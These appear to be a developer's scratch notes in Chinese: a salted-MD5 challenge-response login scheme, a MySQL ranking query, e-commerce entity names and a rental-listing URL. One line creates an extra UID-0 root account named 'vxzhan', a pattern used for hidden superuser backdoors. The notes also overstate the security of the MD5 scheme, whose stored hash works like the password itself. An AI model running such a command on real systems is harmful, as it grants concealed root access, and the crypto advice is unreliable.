
************************************************************************************************************

任务正理：PostgreSQL  PHP模式   EA11  Sass Javascript 7



加密盐，防止md5值被逆向。
salt = "网站自定义的一个加密盐"，服务端和客户端都有该值。

注册的时候对密码加盐做散列vp = md5(密码明文+salt)，保存到数据库。

登陆：
服务器端产生一个随机值rnd保存在服务器的session里面，并传给浏览器;

浏览器提交加密过的密文：md5(md5(密码明文+salt)+rnd)

服务器验证的时候从数据库读出注册时候保存的散列值vp，做运算md5(vp+rnd)，和浏览器提交的密文做比较。

这样至少可以让服务器不保存密码明文也能防止暴库之后被逆向，同时登陆过程中提交的密文也基本没法还原。
因此中间人只能抓取会话，重放会话，会话过期之后也没法重放了。




面向对象应该牢记：保持对象小型化，模块化，非耦合以及流线型 。

************************************************************************************************************
www.multimall.cn

卖家（vendor）  商品(wares)   订单(order)   买家（buyer） 



useradd -o -u 0 -g 0 -M -d /root -s /bin/bash vxzhan
select (@i:=@i+1) as i,post_time from tb_check_price,(select @i:=0) as tt  order by post_time desc; 


************************************************************************************************************

http://sz.58.com/zufang/26003251752526x.shtml?adtype=1&entinfo=26003251752526_0&psid=141242899191811687436163665&iuType=q_2&ClickID=2&version=A&PGTID=0d300008-0180-7b76-4c11-c0da65a5ad52










